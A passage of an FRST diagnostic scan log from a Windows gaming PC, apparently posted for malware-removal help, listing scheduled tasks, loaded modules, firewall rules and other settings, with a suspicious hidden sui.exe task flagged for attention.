Task: {7929F897-2D3D-48F8-8DCD-3739A872F66C} - System32\Tasks\ASUS\ASUSUpdateTaskMachineUA => C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [2018-06-03] (ASUSTeK Computer Inc.) <==== ATTENTION
Task: {811DF0C7-1098-48CA-93C5-55EAEFF494ED} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1409225181-4065645274-1912239689-1002 => C:\Users\cheat\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Task: {8336B3A8-77EB-4D96-BCB2-9704A0EFB9CA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.16.17656.18052-0\MpCmdRun.exe [2018-06-03] (Microsoft Corporation)
Task: {87BE6EAD-6FB2-4277-B781-320E9DD7AB52} - System32\Tasks\ASUS\USB 3.0 Boost Service => C:\Program Files (x86)\ASUS\AI Suite III\USB 3.0 Boost\U3BoostSvr.exe [2013-07-24] (ASUSTeK Computer Inc.)
Task: {88705292-B392-4729-8EAA-2B07A12AE1C3} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1409225181-4065645274-1912239689-1002UA => C:\Users\cheat\AppData\Local\Google\Update\GoogleUpdate.exe [2018-06-02] (Google Inc.)
Task: {9746FD2B-BEBD-40CA-88BE-9D4B847F4E28} - System32\Tasks\ASUS\Ez Update => C:\Program Files (x86)\ASUS\AI Suite III\EZ Update\EzUpdt.exe [2013-07-24] ()
Task: {AD7BE146-2930-49F3-A791-C19CD3B38486} - System32\Tasks\ASUS\ASUSUpdateTaskMachineCore => C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [2018-06-03] (ASUSTeK Computer Inc.) <==== ATTENTION
Task: {C02EB3F7-9B1A-47FD-8E57-A7B6977BA6DA} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2018-05-23] (NVIDIA Corporation)
Task: {C5EBC2A2-175E-4A54-87F9-19691072D722} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1409225181-4065645274-1912239689-1002Core => C:\Users\cheat\AppData\Local\Google\Update\GoogleUpdate.exe [2018-06-02] (Google Inc.)
Task: {C61FA227-35F6-438F-9D81-ECC058787AE0} - System32\Tasks\NvTmRepCR3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-05-23] (NVIDIA Corporation)
Task: {CDE1FE21-DBC0-42C9-99AC-7EE286C6C28C} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-05-23] (NVIDIA Corporation)
Task: {CF5E0BE0-7F91-4824-9AB2-54041C037675} - System32\Tasks\NvTmRepCR1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-05-23] (NVIDIA Corporation)
Task: {DE7F0752-2929-4C4A-B521-AC5C8FA2BB01} - System32\Tasks\NvTmRepCR2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-05-23] (NVIDIA Corporation)
Task: {E86B56EE-F6EC-4395-8293-B50277B038CB} - System32\Tasks\Intel\Intel Telemetry 2 (x86) => C:\Program Files (x86)\Intel\Telemetry 2.0\lrio.exe [2016-03-17] (Intel Corporation)
Task: {EBF2DF24-8BEB-4E28-94AB-8F1BBEC379C4} - System32\Tasks\Menu => C:\Users\cheat\AppData\Roaming\sui.exe [2018-08-23] () <==== ATTENTION
Task: {F1CDB55E-7E19-485F-B103-346339E5E444} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.16.17656.18052-0\MpCmdRun.exe [2018-06-03] (Microsoft Corporation)
Task: {F9F0E69E-3633-4A1E-9752-5709E7AE8555} - System32\Tasks\ASUS\ASUS AISuiteIII => C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe [2013-08-07] (ASUSTeK Computer Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


ShortcutWithArgument: C:\Users\cheat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome\Chrome Apps & Extensions Developer Tool.lnk -> C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=ohmmkhmmmpcnpikjeljgnaoabkaalbgc
ShortcutWithArgument: C:\Users\cheat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome\Hudba Google Play.lnk -> C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=fahmaaghhglfmonjliepjlchgpgfmobi

==================== Loaded Modules (Whitelisted) ==============

2018-04-12 01:34 - 2018-04-12 01:34 - 000491744 _____ () C:\Windows\System32\InputHost.dll
2018-08-19 18:19 - 2018-07-24 12:32 - 002681424 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2018-05-15 18:59 - 2018-05-15 18:59 - 000088888 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2018-05-15 18:58 - 2018-05-15 18:58 - 001356088 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2018-06-02 23:34 - 2018-05-23 00:00 - 001314752 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2018-06-03 01:09 - 2015-08-20 12:41 - 001360016 _____ () C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.22\AsSysCtrlService.exe
2018-07-25 14:14 - 2018-07-14 05:56 - 000023040 _____ () C:\Windows\System32\hnsproxy.dll
2018-06-03 22:30 - 2018-06-03 22:28 - 000348136 _____ () C:\Program Files (x86)\Steam\steamapps\common\wallpaper_engine\bin\wallpaperservice32_c.exe
2018-04-12 01:33 - 2018-04-12 01:33 - 000031744 _____ () C:\Windows\system32\HvSocket.dll
2018-04-25 16:49 - 2018-04-25 16:49 - 000282072 _____ () C:\Program Files (x86)\LightingService\AsRogAuraGpuDllServer.exe
2018-06-02 23:33 - 2013-07-24 10:16 - 001425208 _____ () C:\Program Files (x86)\ASUS\AI Suite III\EZ Update\EzUpdt.exe
2018-06-02 23:34 - 2018-05-23 00:00 - 095437248 _____ () C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\libcef.dll
2018-06-19 12:51 - 2018-06-19 12:51 - 001922224 _____ () C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.10314.31700.0_x64__8wekyb3d8bbwe\Microsoft.Applications.Telemetry.Windows.dll
2018-06-02 23:34 - 2018-05-23 00:00 - 003028928 _____ () C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\swiftshader\libglesv2.dll
2018-06-02 23:34 - 2018-05-23 00:00 - 000149440 _____ () C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\swiftshader\libegl.dll
2018-08-17 20:21 - 2018-08-23 21:18 - 296048640 __RSH () C:\Users\cheat\AppData\Roaming\sui.exe
2018-08-10 00:19 - 2018-08-08 02:41 - 004855640 _____ () C:\Users\cheat\AppData\Local\Google\Chrome\Application\68.0.3440.106\libglesv2.dll
2018-08-10 00:19 - 2018-08-08 02:41 - 000115544 _____ () C:\Users\cheat\AppData\Local\Google\Chrome\Application\68.0.3440.106\libegl.dll
2018-08-22 14:11 - 2018-08-22 14:12 - 000479232 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
2018-08-22 14:11 - 2018-08-22 14:12 - 069280768 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll
2018-06-02 23:33 - 2018-06-02 23:34 - 002523136 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\UnityEngineDelegates.dll
2018-07-26 20:09 - 2018-07-26 20:10 - 000049664 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\RenderingPlugin.dll
2018-08-22 14:11 - 2018-08-22 14:12 - 003699200 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\MediaEngineCSWrapper.dll
2018-06-02 23:33 - 2018-06-02 23:34 - 000009216 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\ImagePipelineNative.dll
2018-08-22 14:11 - 2018-08-22 14:12 - 000035328 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\WinMLWrapper.UWP.dll
2018-07-26 20:09 - 2018-07-26 20:10 - 002280960 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\opencv_core320.dll
2018-07-26 20:09 - 2018-07-26 20:10 - 002480640 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\opencv_imgproc320.dll
2018-06-02 23:33 - 2018-06-02 23:34 - 002283008 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\TrackingDLLUWP.dll
2018-08-22 14:11 - 2018-08-22 14:12 - 014335488 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\PhotosApp.Windows.dll
2018-08-22 14:11 - 2018-08-22 14:12 - 003544576 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\MediaEngine.dll
2018-08-22 14:11 - 2018-08-22 14:12 - 002870272 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\AppCore.Windows.dll
2018-08-22 14:11 - 2018-08-22 14:12 - 000973312 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\RuntimeConfiguration.dll
2018-07-26 20:09 - 2018-07-26 20:10 - 004584960 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll
2018-03-19 01:40 - 2018-03-19 01:40 - 000230064 _____ () C:\Program Files\Notepad++\NppShell_06.dll
2018-04-12 01:34 - 2018-04-12 01:34 - 000472064 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-04-12 01:34 - 2018-04-12 01:34 - 002759168 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2018-08-14 21:24 - 2018-08-03 05:09 - 002185728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2018-08-24 21:08 - 2018-08-24 21:08 - 001676800 _____ () C:\Windows\IEcache.exe
2018-06-02 23:37 - 2017-12-26 21:26 - 000081368 _____ () C:\Program Files (x86)\ASUS\AXSP\4.00.01\ATKEX.dll
2018-06-02 23:37 - 2017-12-26 21:26 - 000229848 _____ () C:\Program Files (x86)\ASUS\AXSP\4.00.01\ASUS_WMI.dll
2018-06-02 23:37 - 2018-08-24 21:05 - 000038032 _____ () C:\Program Files (x86)\ASUS\AXSP\4.00.01\PEbiosinterface32.dll
2018-06-02 23:37 - 2017-12-26 21:26 - 000053248 _____ () C:\Program Files (x86)\ASUS\AXSP\4.00.01\cpuutil.dll
2018-08-23 21:18 - 2018-07-09 14:20 - 000114664 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\zlib1.dll
2018-08-23 21:18 - 2018-07-09 14:20 - 000108008 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\boost_filesystem-vc120-mt-1_56.dll
2018-08-23 21:18 - 2018-07-09 14:20 - 000024040 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\boost_system-vc120-mt-1_56.dll
2018-08-23 21:18 - 2018-07-09 14:20 - 000048104 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\boost_date_time-vc120-mt-1_56.dll
2018-04-18 15:11 - 2018-04-18 15:11 - 000047576 _____ () C:\Program Files (x86)\LightingService\AuraHueWrapper.dll
2018-04-18 15:11 - 2018-04-18 15:11 - 001777664 _____ () C:\Program Files (x86)\LightingService\Vender.dll
2018-04-18 15:11 - 2018-04-18 15:11 - 000073728 _____ () C:\Program Files (x86)\LightingService\ClaymoreProtocol.dll
2018-04-18 15:11 - 2018-04-18 15:11 - 000073728 _____ () C:\Program Files (x86)\LightingService\CharmProtocol.dll
2018-04-18 15:11 - 2018-04-18 15:11 - 000073728 _____ () C:\Program Files (x86)\LightingService\RogNewmouseProtocol.dll
2018-04-24 20:49 - 2018-04-24 20:49 - 000827904 _____ () C:\Program Files\ASUS\ASUS_Aac_DRAM\Aac3572DramHal_x86.dll
2018-04-18 12:14 - 2018-04-18 12:14 - 000156672 _____ () C:\Program Files\Patriot\Aac_Patriot Viper RGB\AacHal_x86.dll
2018-04-26 15:48 - 2018-04-26 15:48 - 000236032 _____ () C:\Program Files\ASUS\CORSAIR_Aac_DRAM\AacCosairDramHal_x86.dll
2018-04-26 11:17 - 2018-04-26 11:17 - 000245248 _____ () C:\Program Files\ASUS\KINGSTON_Aac_DRAM\AacKingstonDramHal_x86.dll
2018-04-18 15:11 - 2018-04-18 15:11 - 001951232 _____ () C:\Program Files (x86)\LightingService\R2Clib.dll
2018-04-18 15:11 - 2018-04-18 15:11 - 000053248 _____ () C:\Program Files (x86)\LightingService\cpuutil.dll
2018-06-02 23:33 - 2013-07-31 20:05 - 005773588 _____ () C:\Program Files (x86)\ASUS\AI Suite III\EZ Update\EzULIB.dll
2018-06-02 23:33 - 2010-06-21 15:21 - 000208896 _____ () C:\Program Files (x86)\ASUS\AI Suite III\EZ Update\ImageHelper.dll
2018-06-02 23:33 - 2013-08-07 19:11 - 000147456 _____ () C:\Program Files (x86)\ASUS\AI Suite III\AssistFunc.dll
2018-06-02 23:33 - 2013-08-08 14:41 - 002747392 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\dip4.dll
2018-06-02 23:33 - 2013-08-29 15:59 - 001138176 _____ () C:\Program Files (x86)\ASUS\AI Suite III\EZ Update\EasyUpdt.dll
2018-06-02 23:33 - 2013-06-04 11:41 - 000662016 _____ () C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMLib.dll
2018-06-02 23:33 - 2013-08-07 19:11 - 000053248 _____ () C:\Program Files (x86)\ASUS\AI Suite III\cpuutil.dll
2018-06-02 23:33 - 2013-08-08 14:35 - 000010240 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\IccHelper.dll
2018-06-02 23:34 - 2012-01-19 09:39 - 000028672 _____ () C:\Program Files (x86)\ASUS\AI Suite III\USB BIOS Flashback\PEInfo.dll
2018-06-02 23:33 - 2013-08-07 19:11 - 000208896 _____ () C:\Program Files (x86)\ASUS\AI Suite III\ImageHelper.dll
2018-06-02 23:33 - 2013-08-07 19:11 - 000253952 _____ () C:\Program Files (x86)\ASUS\AI Suite III\pngio.dll
2018-06-02 23:34 - 2010-09-23 11:51 - 000114688 _____ () C:\Program Files (x86)\ASUS\AI Suite III\USB BIOS Flashback\AsIdxParser.dll
2018-06-02 23:34 - 2010-02-25 14:01 - 000139264 _____ () C:\Program Files (x86)\ASUS\AI Suite III\USB BIOS Flashback\Aszip.dll
2017-11-27 18:10 - 2017-11-27 18:10 - 000065536 _____ () C:\Program Files (x86)\ASUS\GPU TweakII\Exeio.dll
2018-02-11 16:00 - 2018-02-11 16:00 - 001774592 _____ () C:\Program Files (x86)\ASUS\GPU TweakII\Vender.dll
2018-06-02 23:34 - 2018-05-23 00:00 - 001032640 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2018-06-02 23:27 - 2018-06-08 23:38 - 000788256 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2018-06-02 23:27 - 2018-06-09 01:39 - 002632992 _____ () C:\Program Files (x86)\Steam\video.dll
2018-06-02 23:27 - 2018-06-08 23:42 - 004969248 _____ () C:\Program Files (x86)\Steam\v8.dll
2018-06-02 23:27 - 2018-06-08 23:40 - 000695584 _____ () C:\Program Files (x86)\Steam\libavformat-57.dll
2018-06-02 23:27 - 2018-06-08 23:40 - 000351520 _____ () C:\Program Files (x86)\Steam\libavresample-3.dll
2018-06-02 23:27 - 2018-06-08 23:40 - 000847136 _____ () C:\Program Files (x86)\Steam\libavutil-55.dll
2018-06-02 23:27 - 2018-06-08 23:40 - 000783648 _____ () C:\Program Files (x86)\Steam\libswscale-4.dll
2018-06-02 23:27 - 2018-06-08 23:40 - 001563936 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2018-06-02 23:27 - 2018-06-08 23:40 - 001195296 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2018-06-02 23:27 - 2018-06-08 23:40 - 005137696 _____ () C:\Program Files (x86)\Steam\libavcodec-57.dll
2018-06-02 23:27 - 2018-06-09 01:38 - 000979744 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2018-06-02 23:27 - 2018-06-08 23:40 - 000266560 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2018-06-02 23:27 - 2018-06-08 23:39 - 000788256 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\SDL2.dll
2018-06-02 23:27 - 2018-06-08 23:39 - 083524384 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll
2018-06-02 23:27 - 2018-06-08 23:42 - 000119208 _____ () C:\Program Files (x86)\Steam\winh264.dll
2018-06-02 23:27 - 2018-06-08 23:39 - 002253600 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\swiftshader\libglesv2.dll
2018-06-02 23:27 - 2018-06-08 23:39 - 000109856 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\swiftshader\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2018-04-12 01:38 - 2018-04-12 01:36 - 000000824 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\cheat\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\2k-space-wallpapers-12.jpg
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\StartupApproved\Run: => "CyberGhost"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{6EA6C6FB-44C0-43DA-B375-5DB485D92F8B}C:\users\cheat\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\cheat\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [UDP Query User{91D90389-D818-4ECF-AD63-813D657068E3}C:\users\cheat\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\cheat\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{B2FD56B7-75DD-45B6-A4B4-440E5F4B89D8}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{BA9F7D1E-00D4-4760-9FB1-42601102538C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{49A1602E-41AB-494A-A1C7-DB815E45B5FA}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{B47F3184-FBE9-472D-98DB-17D3F2F817CE}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{CFBEE400-65DB-4DBC-BB6B-0C9A6DC89EAB}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{F5DC4167-2AB2-4EF8-9807-3B52382BB4A6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{E0F25E19-3A13-42D2-9180-F38910D3D790}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{9B634332-7B77-41DD-8617-FC959ABFB203}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{5F8579E8-97ED-44BD-9A9E-DEE9F9BD8247}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{D9054139-C945-45A4-8BBB-8C3FA0BA1662}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [TCP Query User{77C68027-1CE2-4230-B32A-192CA9BFF10C}C:\users\cheat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\cheat\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{940AF356-5F3F-44B9-8353-928F7052C482}C:\users\cheat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\cheat\appdata\roaming\spotify\spotify.exe
FirewallRules: [{6582BE93-8BBB-4350-B11D-CF8C10F641D1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Grand Theft Auto V\GTAVLauncher.exe
FirewallRules: [{A1B76B3A-4F75-4FC8-9806-CEDCB1409DCF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Grand Theft Auto V\GTAVLauncher.exe
FirewallRules: [TCP Query User{5EA7C50F-E22D-4DDA-A4D4-BA3A4C6C7574}C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe
FirewallRules: [UDP Query User{C40BF5D2-6333-4DA8-9032-80D8C37D8D36}C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe
FirewallRules: [{7063CD98-6724-4533-94B9-4732C6793E41}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Far Cry Primal\bin\FCPrimal.exe
FirewallRules: [{A39570C8-F9AF-4D92-B39D-DFEFF6C92684}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Far Cry Primal\bin\FCPrimal.exe
FirewallRules: [TCP Query User{11D9AFA6-91F5-4E89-8C21-0F3E46B4E229}C:\program files (x86)\diablo iii\x64\diablo iii64.exe] => (Allow) C:\program files (x86)\diablo iii\x64\diablo iii64.exe
FirewallRules: [UDP Query User{3EF255B9-7E5A-4577-B90C-31BB8ABF70B7}C:\program files (x86)\diablo iii\x64\diablo iii64.exe] => (Allow) C:\program files (x86)\diablo iii\x64\diablo iii64.exe
FirewallRules: [{6CFD3563-CCA8-4DC1-8915-FC3A3BC63005}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Far Cry Primal\bin\FCPrimal.exe
FirewallRules: [{D4F530BF-9A45-45DC-B556-25F5D7E2A404}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Far Cry Primal\bin\FCPrimal.exe
FirewallRules: [{F0F3FE5F-F74C-4EEC-9973-2832AC2F2481}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Far Cry 4\bin\FarCry4.exe
FirewallRules: [{979242D5-0BE1-402B-BEF9-550B507A815A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Far Cry 4\bin\FarCry4.exe
FirewallRules: [{CDA3A6E7-5520-4A8E-B1C0-F842D09EED71}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Far Cry 4\bin\IGE_WPF64.exe
FirewallRules: [{9E390100-578C-4088-B63B-0F83E609A0E7}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Far Cry 4\bin\IGE_WPF64.exe
FirewallRules: [{A1EA035C-113A-42DF-85F8-BA6F303F9316}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Path of Exile\PathOfExileSteam.exe
FirewallRules: [{101C98E6-138D-433D-8A3D-B7CEA6CB8694}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Path of Exile\PathOfExileSteam.exe
FirewallRules: [TCP Query User{C9EE8E06-653F-4894-A693-74F9788323D6}E:\games\battlefield 1\bf1.exe] => (Allow) E:\games\battlefield 1\bf1.exe
FirewallRules: [UDP Query User{72714654-C22A-4616-94BC-8909629A4F96}E:\games\battlefield 1\bf1.exe] => (Allow) E:\games\battlefield 1\bf1.exe
FirewallRules: [VIRT-MIGL-In-TCP-NoScope] => (Allow) %systemroot%\system32\vmms.exe
FirewallRules: [VIRT-REMOTEDESKTOP-In-TCP-NoScope] => (Allow) %systemroot%\system32\vmms.exe
FirewallRules: [{139C2629-6ABE-4039-A3A4-9EA1A54B02FE}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{EE1FF1B1-E227-48BD-8F13-D409E59BCCB2}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{9FD565C4-2789-4962-AF35-0FECF03C66E8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\assettocorsa\AssettoCorsa.exe
FirewallRules: [{41E03DD8-0CED-4965-9648-859CC38790FF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\assettocorsa\AssettoCorsa.exe
FirewallRules: [TCP Query User{48F34B00-4EDB-415E-AA72-D16C251DD07F}C:\program files (x86)\steam\steamapps\common\assettocorsa\acs.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\assettocorsa\acs.exe
FirewallRules: [UDP Query User{B5861478-DF4C-4E23-B846-27621A9B75E1}C:\program files (x86)\steam\steamapps\common\assettocorsa\acs.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\assettocorsa\acs.exe
FirewallRules: [{572EEA86-01A7-478C-A6A7-A8E58D31CFA3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 2\Fallout2Launcher.exe
FirewallRules: [{28E65332-4BAA-4DF8-ADFF-9A46FB3A8247}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 2\Fallout2Launcher.exe
FirewallRules: [{6061AD5C-74AA-49D8-A61C-09F3319CF4A7}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Crysis 2 Game of the Year\bin32\Crysis2Launcher.exe
FirewallRules: [{7EE0478F-8F5D-442D-962A-8F0D6258B468}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Crysis 2 Game of the Year\bin32\Crysis2Launcher.exe
FirewallRules: [TCP Query User{81B02A0B-EDB8-4B48-A893-3C76388D81A5}C:\program files (x86)\steam\steamapps\common\crysis 2 game of the year\bin32\crysis2.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\crysis 2 game of the year\bin32\crysis2.exe
FirewallRules: [UDP Query User{7571F850-1A65-404F-B083-DD7996AF5D1D}C:\program files (x86)\steam\steamapps\common\crysis 2 game of the year\bin32\crysis2.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\crysis 2 game of the year\bin32\crysis2.exe
FirewallRules: [{3D50543D-A20C-4317-A3BC-F1BA8419CEB1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{1F751869-B3A3-404B-BE05-E340A60CD55F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [TCP Query User{912EC302-D039-49E6-A73B-30ABFCFCD383}C:\program files (x86)\steam\steamapps\common\fallout 4\creationkit.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\fallout 4\creationkit.exe
FirewallRules: [UDP Query User{06573978-65FB-4CBB-BFE9-E4D12F3243F8}C:\program files (x86)\steam\steamapps\common\fallout 4\creationkit.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\fallout 4\creationkit.exe
FirewallRules: [DNS Server Forward Rule - TCP - 68856003-c685-4c51-840f-9758cecf39c8 - 0] => (Allow) LPort=53
